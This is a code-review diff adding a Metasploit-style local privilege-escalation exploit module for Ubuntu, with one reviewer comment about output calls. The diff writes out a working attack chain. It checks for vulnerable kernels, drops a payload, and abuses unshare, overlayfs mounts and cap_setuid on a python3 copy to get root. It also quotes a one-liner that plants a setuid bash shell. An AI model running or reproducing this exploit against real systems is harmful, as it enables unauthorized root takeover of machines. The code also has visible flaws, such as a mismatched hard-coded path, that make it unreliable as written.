modules/exploits/linux/local/game_overlay_privesc.rb

```diff
@@ -0,0 +1,161 @@
+    }.transform_keys!(&:to_s) # w/o this key will be :"Bionic Beaver"
+  end
+
+  def check
+    fail_with(Failure::NotVulnerable, 'Target is not linux') unless session.platform == 'linux'
+
+    # Must be Ubuntu
+    fail_with(Failure::NotVulnerable, 'Target is not Ubuntu.') unless kernel_version =~ /[uU]buntu/
+
+    os = cmd_exec 'cat /etc/os-release'
+
+    # grab codename i.e. Focal Fossa
+    codename = os.scan(/\(\w* \w*\)/)[0]
+
+    # Remove '(' and ')'
+    codename.delete_prefix!('(').delete_suffix!(')')
+
+    print_status "Detected Ubuntu version: #{codename}"
+
+    # uname -r
+    # yields something like 5.4.0-1018-blah
+    kernel = kernel_release
+    print_status "Detected kernel version: #{kernel}"
+
+    # Make sure release is running vunerable kernel
+    # will this return in correct context??
+    # could scan kernel to prevent looping if return below doesn't work
+    vuln[codename].each do |version|
+      if kernel.include? version
+        return CheckCode::Vulnerable "#{codename} with #{kernel} kernel is vunerable"
+      end
+    end
+  end
+
+  def execute_command(_cmd, _opts = {})
+    pay_file = datastore['PayloadFilename']
+
+    pay_dir = datastore['WritableDir']
+    pay_dir += "/" unless pay_dir.ends_with? "/"
+    pay_dir += Rex::Text.rand_text_alpha 10
+
+    directories = %w[l u w m].flat_map { |e| "#{pay_dir}#{e}" }
+
+    # Should we make sure directory doesn't already exist?
+
+    directories.each do |dir|
+      print_status "Creating directory #{dir}"
+      ::FileUtils.mkdir_p dir
+    end
+
+    register_dir_for_cleanup pay_dir
+
+    print_status "Creating directory to store payload: #{pay_dir}"
+    pay_dir.concat "/" unless pay_dir.ends_with? "/"
+    cmd_exec "mkdir -p #{pay_dir}"
+
+    register_dir_for_cleanup pay_dir
+
+    pay = "#{pay_dir}#{pay_file}"
+
+    print_status "Writing payload: #{pay}"
+
+    write_file "#{pay}", generate_payload_exe
+    # works move test to low, run unshare mount set cap, shell
+
+    print_status 'Starting new namespace, and running exploit...'
+
+    # g1vi original
+    # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'"
+    
+    # TODO move running of payload and exploit to different cmd_exec calls
+    hack =  <<-TEXT
+    unshare -rm sh -c \"cp /u*/b*/p*3 #{pay_dir};
+        setcap cap_setuid+eip #{pay_dir}l/python3; 
+        mount -t overlay overlay -o rw,lowerdir=#{pay_dir}l,upperdir=#{pay_dir}u,workdir=#{pay_dir}w #{pay_dir}m 
+        && touch /tmp/main/m/* 
+      \" 
+     && #{pay_dir}/u/python3 -c 'import os;os.setuid(0); os.system(\"#{pay}\")'
+    TEXT
+
+    print_status "Running exploit:\n '#{hack}'\n "
+    puts cmd_exec_with_result(hack)
```

Comment:
Please use `print_status` instead of `puts`. There's a couple instances of this. 
```suggestion
    print_status(cmd_exec_with_result(hack))
```